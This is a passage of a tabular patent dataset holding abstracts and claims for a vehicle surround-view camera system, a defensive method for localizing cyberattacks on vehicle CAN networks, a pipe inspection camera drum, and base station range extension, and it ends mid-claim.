9,152 | 9,152 | 16,392,036 | 2,486 | A vehicular vision system includes a plurality of cameras disposed at a vehicle and having respective exterior fields of view, and a display screen for displaying images derived from captured image data in a surround view format where captured image data is merged to provide a single composite display image from a virtual viewing position. A control includes a processor that processes image data captured by the cameras to detect an object present in the field of view of at least one of the cameras. During a driving maneuver of the vehicle, the display screen displays surround view video images and responsive to detection of the object, the display screen displays an enlarged view of the detected object. | 1. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; and wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays an enlarged view of the detected object. 2. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, centers the virtual viewing position on the detected object. 3. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays multiple images in a split screen format. 4. The vehicular vision system of claim 3, wherein the displayed multiple images comprises at least two displayed images of the detected object. 5. The vehicular vision system of claim 1, wherein the display screen displays the enlarged view of the detected object while also continuing to display a non-enlarged view of the detected object in the displayed surround view video images. 6. The vehicular vision system of claim 5, wherein the display screen displays the enlarged view of the detected object and the surround view video images in a split screen format. 7. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed detected object. 8. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, highlights the detected object via a color change in the displayed images of the detected object. 9. The vehicular vision system of claim 1, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 10. The vehicular vision system of claim 1, comprising a gesture sensing device operable to sense a gesture made by a driver of the equipped vehicle, wherein, responsive at least in part to determination, via the gesture sensing device, of a gesture made by the driver, the control adjusts at least one selected from the group consisting of (i) the virtual viewing position for the displayed composite image and (ii) a virtual viewing angle of the displayed composite image from the virtual viewing position. 11. The vehicular vision system of claim 10, wherein the control calculates the virtual viewing position or the virtual viewing angle in real time without use of precalculated mapping tables. 12. The vehicular vision system of claim 10, wherein the control adjusts the displayed images responsive to detection by the gesture sensing device of one or more fingers of a hand of the driver touching and moving at a touch screen of the gesture sensing device. 13. The vehicular vision system of claim 10, wherein the gesture sensing device comprises at least one of (i) a time of flight sensor, (ii) at least one camera having a field of view interior of the equipped vehicle, (iii) a single camera having a field of view interior of the equipped vehicle and comprising motion disparity detection, and (iv) two cameras having fields of view interior of the equipped vehicle and comprising stereo camera disparity detection. 14. The vehicular vision system of claim 10, wherein, responsive to a determination by the gesture sensing device of a head movement made by the driver of the equipped vehicle, the control adjusts a virtual viewing location of the displayed images. 15. A vehicular vision system comprising:
at least one camera disposed at a vehicle equipped with the vehicular vision system and having a respective exterior field of view, the at least one camera comprising a rearward viewing camera having at least a rearward field of view; a display screen for displaying video images derived from image data captured by the at least one camera; a control comprising a processor for processing image data captured by the at least one camera; wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects an object present in the field of view of the at least one camera; wherein, during a reverse driving maneuver of the equipped vehicle, the display screen displays rearward view video images derived from image data captured by the at least one camera; and wherein, during the reverse driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays in a split screen format (i) an enlarged view of the detected object and (ii) the rearward view video images. 16. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, centers a virtual viewing position on the detected object. 17. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed images of the detected object. 18. The vehicular vision system of claim 15, wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 19. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays multiple images in a split screen format, and wherein the displayed multiple images comprise at least the single composite display image and an enlarged view of the detected object; and wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the detected object in at least one of the displayed multiple images. 20. The vehicular vision system of claim 19, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of objects in separate respective enlarged views of the respective detected objects, and wherein the displayed multiple images comprise the single composite display image and the separate respective enlarged views of the respective detected objects. | A vehicular vision system includes a plurality of cameras disposed at a vehicle and having respective exterior fields of view, and a display screen for displaying images derived from captured image data in a surround view format where captured image data is merged to provide a single composite display image from a virtual viewing position. A control includes a processor that processes image data captured by the cameras to detect an object present in the field of view of at least one of the cameras. During a driving maneuver of the vehicle, the display screen displays surround view video images and responsive to detection of the object, the display screen displays an enlarged view of the detected object.1. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; and wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays an enlarged view of the detected object. 2. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, centers the virtual viewing position on the detected object. 3. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays multiple images in a split screen format. 4. The vehicular vision system of claim 3, wherein the displayed multiple images comprises at least two displayed images of the detected object. 5. The vehicular vision system of claim 1, wherein the display screen displays the enlarged view of the detected object while also continuing to display a non-enlarged view of the detected object in the displayed surround view video images. 6. The vehicular vision system of claim 5, wherein the display screen displays the enlarged view of the detected object and the surround view video images in a split screen format. 7. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed detected object. 8. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, highlights the detected object via a color change in the displayed images of the detected object. 9. The vehicular vision system of claim 1, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 10. The vehicular vision system of claim 1, comprising a gesture sensing device operable to sense a gesture made by a driver of the equipped vehicle, wherein, responsive at least in part to determination, via the gesture sensing device, of a gesture made by the driver, the control adjusts at least one selected from the group consisting of (i) the virtual viewing position for the displayed composite image and (ii) a virtual viewing angle of the displayed composite image from the virtual viewing position. 11. The vehicular vision system of claim 10, wherein the control calculates the virtual viewing position or the virtual viewing angle in real time without use of precalculated mapping tables. 12. The vehicular vision system of claim 10, wherein the control adjusts the displayed images responsive to detection by the gesture sensing device of one or more fingers of a hand of the driver touching and moving at a touch screen of the gesture sensing device. 13. The vehicular vision system of claim 10, wherein the gesture sensing device comprises at least one of (i) a time of flight sensor, (ii) at least one camera having a field of view interior of the equipped vehicle, (iii) a single camera having a field of view interior of the equipped vehicle and comprising motion disparity detection, and (iv) two cameras having fields of view interior of the equipped vehicle and comprising stereo camera disparity detection. 14. The vehicular vision system of claim 10, wherein, responsive to a determination by the gesture sensing device of a head movement made by the driver of the equipped vehicle, the control adjusts a virtual viewing location of the displayed images. 15. A vehicular vision system comprising:
at least one camera disposed at a vehicle equipped with the vehicular vision system and having a respective exterior field of view, the at least one camera comprising a rearward viewing camera having at least a rearward field of view; a display screen for displaying video images derived from image data captured by the at least one camera; a control comprising a processor for processing image data captured by the at least one camera; wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects an object present in the field of view of the at least one camera; wherein, during a reverse driving maneuver of the equipped vehicle, the display screen displays rearward view video images derived from image data captured by the at least one camera; and wherein, during the reverse driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays in a split screen format (i) an enlarged view of the detected object and (ii) the rearward view video images. 16. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, centers a virtual viewing position on the detected object. 17. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed images of the detected object. 18. The vehicular vision system of claim 15, wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 19. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays multiple images in a split screen format, and wherein the displayed multiple images comprise at least the single composite display image and an enlarged view of the detected object; and wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the detected object in at least one of the displayed multiple images. 20. The vehicular vision system of claim 19, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of objects in separate respective enlarged views of the respective detected objects, and wherein the displayed multiple images comprise the single composite display image and the separate respective enlarged views of the respective detected objects. | 2,400 |
9,153 | 9,153 | 15,967,157 | 2,498 | A method for protecting a network against a cyberattack, in which for a message in the network first characteristics of a first transmission of the message are determined and an origin of the message in the network is determined by a comparison of the first characteristics with at least one fingerprint of at least one subscriber or a segment of the network or a transmission route. If a manipulation of the message is detected, a point of attack of the cyberattack in the network is detected and localized in particular on the basis of the origin of the message. | 1. A method for protecting a network against a cyberattack, comprising:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 2. The method as recited in claim 1, wherein the at least one fingerprint is ascertained by a model from two characteristics of one of: (i) at least one second transmission by the network subscriber, ii) a second transmission from the network segment, or (ii) a second transmission via the transmission route. 3. The method as recited in claim 2, wherein the model comprises one of a learning algorithm, a neural network, a stochastic model, a data-based model, or an automaton-based model. 4. The method as recited in claim 2, wherein the second characteristics are determined at least one of using external measuring equipment, and in a secure environment. 5. The method as recited in claim 2, wherein the second characteristics are determined one of: (i) using internal measuring equipment, (ii) in specific system states of the network, or (iii) in specific system states of a system comprising the network. 6. The method as recited in claim 2, wherein a predetermined test pattern is transmitted in the second transmission. 7. The method as recited in claim 1, wherein the at least one fingerprint is read in from an external source, the at least one fingerprint being at least one of: (i) received from the Internet, or (ii) transmitted into the network in a factory environment. 8. The method as recited in claim 1, wherein the manipulation is detected as a function of one of: (i) a comparison between a characteristic with at least one expected characteristic, the characteristic being a content of the first message, and the at least one expected characteristic being an expected content, or (ii) a comparison of a transmission time of the first message with an expected transmission time. 9. The method as recited in claim 1, wherein a manipulation is detected as a function of an origin of the first message. 10. The method as recited in claim 1, wherein the network is a CAN bus system. 11. The method as recited in claim 1, wherein the network is a vehicle-internal network and a vehicle-internal point of attack of a cyberattack on the network is localized from outside the vehicle. 12. The method as recited in claim 1, wherein at least one of the determination of the first characteristics, and the comparison with the at least one fingerprint, is performed by at least one vehicle control unit which is connected to the network. 13. The method as recited in claim 1, wherein the vehicle control unit has a monitoring unit that is integrated into one of a microcontroller or a transceiver of the vehicle control unit. 14. The method as recited in claim 1, wherein the vehicle control unit is one of a central control unit of the vehicle or a domain control unit of the vehicle. 15. The method as recited in claim 1, wherein at least one of the determination of the first characteristics and the comparison with the at least one fingerprint, is performed by one of: (i) at least one network subscriber specifically provided for monitoring, or (ii) a connected processing unit outside of the vehicle. 16. The method as recited in claim 1, wherein the first characteristics are determined on the basis of a step response or a pulse response of the network during the transmission. 17. The method as recited in claim 1, wherein the first characteristics comprise one of: (i) physical properties of the network, (ii) physical properties of transmission channels, (iii) physical properties of transmission media of the network, (iv) physical properties of a hardware of the network subscribers, (v) physical properties of transceivers or microcontrollers, (vi) physical properties of a topology of the network, or (vii) physical properties of network terminations or terminal resistors. 18. The method as recited in claim 1, wherein the first characteristics comprise one of: (i) a length of transmitted message bits, (ii) a jitter of the transmission, (iii) a current flow direction of the transmission, (iv) an inner resistance of a network subscriber during the transmission, (v) a voltage curve during the transmission, (vi) frequency components of the transmission, or (vii) a clock offset during the transmission. 19. The method as recited in claim 1, wherein the first characteristics comprise times of a transmission. 20. The method as recited in claim 1, wherein the first characteristics are introduced into the network or are reinforced in the network via hardware selection or hardware manipulation. 21. The method as recited in claim 1, wherein multiple different second characteristics are used for the at least one fingerprint. 22. The method as recited in claim 16, wherein on the basis of a variability of ascertained characteristics the model uses determined reliable characteristics for the at least one fingerprint. 23. The method as recited in claim 1, wherein data regarding the first characteristics or regarding the at least one fingerprint are distributed in the vehicle or are stored outside the vehicle on a server. 24. The method as recited in claim 1, wherein, in the event of a detected manipulation of the message, an error handling is performed, the error handling including one of: (i) a termination of the transmission of the message, (ii) an identification of the message as invalid, (iii) an exclusion of the localized point of attack from the network, (iv) a deactivation of a gateway of the network in order to cut off a localized point of attack of the network from other parts of the network, or (v) a transmission of a warning message about the detected manipulation. 25. The method as recited in claim 24, wherein the error handling is performed specifically for one of a localized network subscriber, a localized network segment, or a localized transmission route of the network. 26. The method as recited in claim 1, wherein the at least one fingerprint is adapted, newly prepared or newly received and stored if a message with an authorization that is sufficient for this purpose is received. 27. The method as recited in claim 1, wherein the fingerprint is one of: (i) adapted at specified time intervals, (ii) adapted in predetermined system states, (iii) newly prepared, or (iv) newly received and stored. 28. The method as recited in claim 1, wherein the first characteristics are determined for individual bits of the message. 29. The method as recited in claim 28, wherein the individual bits of the message are classified into one of four groups as a function of a digital value at a beginning and at an end of the respective individual bit and the comparison with the at least one fingerprint is performed separately for each group. 30. A device, designed to protect a network against a cyberattack as a subscriber, the device designed to:
determine, for a message in the network, first characteristics of a first transmission of the message; determine an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localize, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 31. A non-transitory machine-readable storage medium on which is stored a computer program for protecting a network against a cyberattack, the computer program, when executed by a computer, causing the computer to perform:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. | A method for protecting a network against a cyberattack, in which for a message in the network first characteristics of a first transmission of the message are determined and an origin of the message in the network is determined by a comparison of the first characteristics with at least one fingerprint of at least one subscriber or a segment of the network or a transmission route. If a manipulation of the message is detected, a point of attack of the cyberattack in the network is detected and localized in particular on the basis of the origin of the message.1. A method for protecting a network against a cyberattack, comprising:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 2. The method as recited in claim 1, wherein the at least one fingerprint is ascertained by a model from two characteristics of one of: (i) at least one second transmission by the network subscriber, ii) a second transmission from the network segment, or (ii) a second transmission via the transmission route. 3. The method as recited in claim 2, wherein the model comprises one of a learning algorithm, a neural network, a stochastic model, a data-based model, or an automaton-based model. 4. The method as recited in claim 2, wherein the second characteristics are determined at least one of using external measuring equipment, and in a secure environment. 5. The method as recited in claim 2, wherein the second characteristics are determined one of: (i) using internal measuring equipment, (ii) in specific system states of the network, or (iii) in specific system states of a system comprising the network. 6. The method as recited in claim 2, wherein a predetermined test pattern is transmitted in the second transmission. 7. The method as recited in claim 1, wherein the at least one fingerprint is read in from an external source, the at least one fingerprint being at least one of: (i) received from the Internet, or (ii) transmitted into the network in a factory environment. 8. The method as recited in claim 1, wherein the manipulation is detected as a function of one of: (i) a comparison between a characteristic with at least one expected characteristic, the characteristic being a content of the first message, and the at least one expected characteristic being an expected content, or (ii) a comparison of a transmission time of the first message with an expected transmission time. 9. The method as recited in claim 1, wherein a manipulation is detected as a function of an origin of the first message. 10. The method as recited in claim 1, wherein the network is a CAN bus system. 11. The method as recited in claim 1, wherein the network is a vehicle-internal network and a vehicle-internal point of attack of a cyberattack on the network is localized from outside the vehicle. 12. The method as recited in claim 1, wherein at least one of the determination of the first characteristics, and the comparison with the at least one fingerprint, is performed by at least one vehicle control unit which is connected to the network. 13. The method as recited in claim 1, wherein the vehicle control unit has a monitoring unit that is integrated into one of a microcontroller or a transceiver of the vehicle control unit. 14. The method as recited in claim 1, wherein the vehicle control unit is one of a central control unit of the vehicle or a domain control unit of the vehicle. 15. The method as recited in claim 1, wherein at least one of the determination of the first characteristics and the comparison with the at least one fingerprint, is performed by one of: (i) at least one network subscriber specifically provided for monitoring, or (ii) a connected processing unit outside of the vehicle. 16. The method as recited in claim 1, wherein the first characteristics are determined on the basis of a step response or a pulse response of the network during the transmission. 17. The method as recited in claim 1, wherein the first characteristics comprise one of: (i) physical properties of the network, (ii) physical properties of transmission channels, (iii) physical properties of transmission media of the network, (iv) physical properties of a hardware of the network subscribers, (v) physical properties of transceivers or microcontrollers, (vi) physical properties of a topology of the network, or (vii) physical properties of network terminations or terminal resistors. 18. The method as recited in claim 1, wherein the first characteristics comprise one of: (i) a length of transmitted message bits, (ii) a jitter of the transmission, (iii) a current flow direction of the transmission, (iv) an inner resistance of a network subscriber during the transmission, (v) a voltage curve during the transmission, (vi) frequency components of the transmission, or (vii) a clock offset during the transmission. 19. The method as recited in claim 1, wherein the first characteristics comprise times of a transmission. 20. The method as recited in claim 1, wherein the first characteristics are introduced into the network or are reinforced in the network via hardware selection or hardware manipulation. 21. The method as recited in claim 1, wherein multiple different second characteristics are used for the at least one fingerprint. 22. The method as recited in claim 16, wherein on the basis of a variability of ascertained characteristics the model uses determined reliable characteristics for the at least one fingerprint. 23. The method as recited in claim 1, wherein data regarding the first characteristics or regarding the at least one fingerprint are distributed in the vehicle or are stored outside the vehicle on a server. 24. The method as recited in claim 1, wherein, in the event of a detected manipulation of the message, an error handling is performed, the error handling including one of: (i) a termination of the transmission of the message, (ii) an identification of the message as invalid, (iii) an exclusion of the localized point of attack from the network, (iv) a deactivation of a gateway of the network in order to cut off a localized point of attack of the network from other parts of the network, or (v) a transmission of a warning message about the detected manipulation. 25. The method as recited in claim 24, wherein the error handling is performed specifically for one of a localized network subscriber, a localized network segment, or a localized transmission route of the network. 26. The method as recited in claim 1, wherein the at least one fingerprint is adapted, newly prepared or newly received and stored if a message with an authorization that is sufficient for this purpose is received. 27. The method as recited in claim 1, wherein the fingerprint is one of: (i) adapted at specified time intervals, (ii) adapted in predetermined system states, (iii) newly prepared, or (iv) newly received and stored. 28. The method as recited in claim 1, wherein the first characteristics are determined for individual bits of the message. 29. The method as recited in claim 28, wherein the individual bits of the message are classified into one of four groups as a function of a digital value at a beginning and at an end of the respective individual bit and the comparison with the at least one fingerprint is performed separately for each group. 30. A device, designed to protect a network against a cyberattack as a subscriber, the device designed to:
determine, for a message in the network, first characteristics of a first transmission of the message; determine an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localize, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. 31. A non-transitory machine-readable storage medium on which is stored a computer program for protecting a network against a cyberattack, the computer program, when executed by a computer, causing the computer to perform:
determining, for a message in the network, first characteristics of a first transmission of the message; determining an origin of the message in the network by comparing the first characteristics to at least one fingerprint of one of: (i) at least one subscriber of the network, (ii) a segment of the network, or (iii) a transmission route; and localizing, as a function of the determined origin, one of: (i) a cyberattack on the network, or (ii) a point of attack of the cyberattack. | 2,400 |
9,154 | 9,154 | 16,015,910 | 2,482 | A pipe inspection system includes a cable storage drum and a housing configured to removably receive and rotatably support the cable storage drum. A push-cable with a plurality of conductors is stored in the cable storage drum. A camera head is connected to a distal end of the push-cable. A slip-ring assembly has first and second mating portions that when mated provide conductive paths between the plurality of conductors at a proximal end of the push-capable and a display device. The first portion of the slip-ring assembly is mounted on the housing and the second portion of the slip-ring assembly is mounted on the removable cable storage drum. The system connection cable joining the inspection system with a display unit is removable and may be replaced with cables compatible with various alternate image display systems. | 1. A pipe inspection system, comprising:
a housing to removably receive and rotatably support a cable storage drum, the cable storage drum including a centrally mounted and axially projecting hub; a resilient push-cable with a plurality of conductors stored in the cable storage drum in a plurality of coils encircled on the centrally mounted and axially projecting hub; a camera head operatively connected to a distal end of the push-cable; and a wireless communication module attached to or disposed in the cable storage drum to wirelessly transmit images or video signals from the camera head to a communicatively coupled electronic device. 2. The system of claim 1, wherein the communicatively coupled electronic device is a buried object locator. 3. The system of claim 1, wherein the wireless communication module is disposed in the centrally mounted and axially projecting hub. 4. The system of claim 1 further comprising a slip-ring assembly having a first portion mounted on the housing and a second portion mounted on the cable storage drum. 5. The system of claim 4, wherein the first and second portions of the slip-ring assembly including mating connective elements that when mated provide an electrical connection between the plurality of conductors at a proximal end of the push-capable and a display device. 6. The system of claim 4 wherein one of the first and second portions of the slip-ring assembly includes a plurality of springs for biasing the contact pins into engagement with corresponding contact rings. 7. The system of claim 4, further comprising magnets disposed on the slip-ring assembly arranged to provide a rotational count of the cable storage drum. 8. The system of claim 1 wherein the housing includes first and second outer casings that are hingedly connected to open in clam shell fashion. | A pipe inspection system includes a cable storage drum and a housing configured to removably receive and rotatably support the cable storage drum. A push-cable with a plurality of conductors is stored in the cable storage drum. A camera head is connected to a distal end of the push-cable. A slip-ring assembly has first and second mating portions that when mated provide conductive paths between the plurality of conductors at a proximal end of the push-capable and a display device. The first portion of the slip-ring assembly is mounted on the housing and the second portion of the slip-ring assembly is mounted on the removable cable storage drum. The system connection cable joining the inspection system with a display unit is removable and may be replaced with cables compatible with various alternate image display systems.1. A pipe inspection system, comprising:
a housing to removably receive and rotatably support a cable storage drum, the cable storage drum including a centrally mounted and axially projecting hub; a resilient push-cable with a plurality of conductors stored in the cable storage drum in a plurality of coils encircled on the centrally mounted and axially projecting hub; a camera head operatively connected to a distal end of the push-cable; and a wireless communication module attached to or disposed in the cable storage drum to wirelessly transmit images or video signals from the camera head to a communicatively coupled electronic device. 2. The system of claim 1, wherein the communicatively coupled electronic device is a buried object locator. 3. The system of claim 1, wherein the wireless communication module is disposed in the centrally mounted and axially projecting hub. 4. The system of claim 1 further comprising a slip-ring assembly having a first portion mounted on the housing and a second portion mounted on the cable storage drum. 5. The system of claim 4, wherein the first and second portions of the slip-ring assembly including mating connective elements that when mated provide an electrical connection between the plurality of conductors at a proximal end of the push-capable and a display device. 6. The system of claim 4 wherein one of the first and second portions of the slip-ring assembly includes a plurality of springs for biasing the contact pins into engagement with corresponding contact rings. 7. The system of claim 4, further comprising magnets disposed on the slip-ring assembly arranged to provide a rotational count of the cable storage drum. 8. The system of claim 1 wherein the housing includes first and second outer casings that are hingedly connected to open in clam shell fashion. | 2,400 |
9,155 | 9,155 | 15,918,759 | 2,465 | Dynamic range extension of a base station. In one instance, the base station includes a base station modem having a modulator-demodulator, a clock buffer providing an advanced time signal to the modulator-demodulator, a receiver buffer coupled between the modulator-demodulator and a transceiver, a transmitter buffer coupled between the modulator-demodulator and the transceiver, and an electronic processor. The electronic processor is configured to determine a first amount by which to modify a range of a service region of the base station. The electronic processor is also configured to introduce a first delay in the receiver buffer corresponding to the first amount and introduce a second delay in the transmitter buffer corresponding to the first amount. | 1. A base station modem for dynamic range extension of a base station, the base station modem comprising:
a modulator-demodulator configured to be coupled to a transceiver of the base station; a clock buffer configured to receive a universal time source time and to provide a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time; a receiver buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the transceiver and provide the data signals to the modulator-demodulator; a transmitter buffer coupled between the modulator-demodulator and the transceiver configured to receive data signals from the modulator-demodulator and provide the data signals to the transceiver; and an electronic processor coupled to the modulator-demodulator, the clock buffer, the receiver buffer, and the transmitter buffer and configured to:
determine a first amount by which to modify a range of a service region of the base station;
introduce a first delay in the receiver buffer corresponding to the first amount; and
introduce a second delay in the transmitter buffer corresponding to the first amount. 2. The base station modem of claim 1, wherein the electronic processor is further configured to:
introduce a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 3. The base station modem of claim 2, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 4. The base station modem of claim 1, wherein the electronic processor is further configured to:
determine a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 5. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay to introduce the first delay in the receiver buffer. 6. The base station modem of claim 1, wherein the electronic processor is further configured to:
adjust one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay to introduce the second delay in the transmitter buffer. 7. The base station modem of claim 1, wherein the base station further comprises a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, a second sector from the plurality of sectors comprising:
a second modulator-demodulator configured to be coupled to a second transceiver of the base station; a second receiver buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second transceiver and provide the data signals to the second modulator-demodulator; a second transmitter buffer coupled between the second modulator-demodulator and the second transceiver configured to receive data signals from the second modulator-demodulator and provide the data signals to the second transceiver; and the electronic processor coupled to the second modulator-demodulator, the clock buffer, the second receiver buffer, and the second transmitter buffer and further configured to:
determine a second amount by which to modify a second range of a second service region of the second sector;
introduce a third delay in the second receiver buffer corresponding to the second amount; and
introduce a fourth delay in the second transmitter buffer corresponding to the second amount. 8. A method for dynamic range extension of a base station, the method comprising:
determining, with an electronic processor of a base station modem of the base station, a first amount by which to modify a range of a service region of the base station; introducing, with the electronic processor, a first delay in a receiver buffer coupled between a modulator-demodulator of the base station modem and a transceiver of the base station, the first delay corresponding to the first amount; and introducing, with the electronic processor, a second delay in a transmitter buffer coupled between the modulator-demodulator and the transceiver, the second delay corresponding to the first amount. 9. The method of claim 8, further comprising:
receiving, with a clock buffer coupled to the electronic processor and the modulator-demodulator, a universal time source time; and providing, with the clock buffer, a clock signal to the modulator-demodulator, wherein the clock signal is an advanced time of the universal time source time. 10. The method of claim 9, further comprising:
introducing a maximum advance between the clock signal and the universal time source time such that the range of the service region is at a maximum extension range. 11. The method of claim 10, wherein the first delay and the second delay are selected to decrease the range from the maximum extension range and to correspond to the first amount. 12. The method of claim 8, further comprising:
determining a change in location of a mobile communication device in communication with the base station, wherein the first amount is determined such that the mobile communication device is within the service region of the base station. 13. The method of claim 8, wherein introducing the first delay in the receiver buffer further comprises:
adjusting one of a read pointer and a write pointer of the receiver buffer corresponding to the first delay. 14. The method of claim 8, wherein introducing the second delay in the transmitter buffer further comprises:
adjusting one of a read pointer and a write pointer of the transmitter buffer corresponding to the second delay. 15. The method of claim 8, wherein the base station includes a plurality of sectors and wherein the first delay and the second delay are introduced to modify the range of the service region of a first sector of the plurality of sectors, the method comprising:
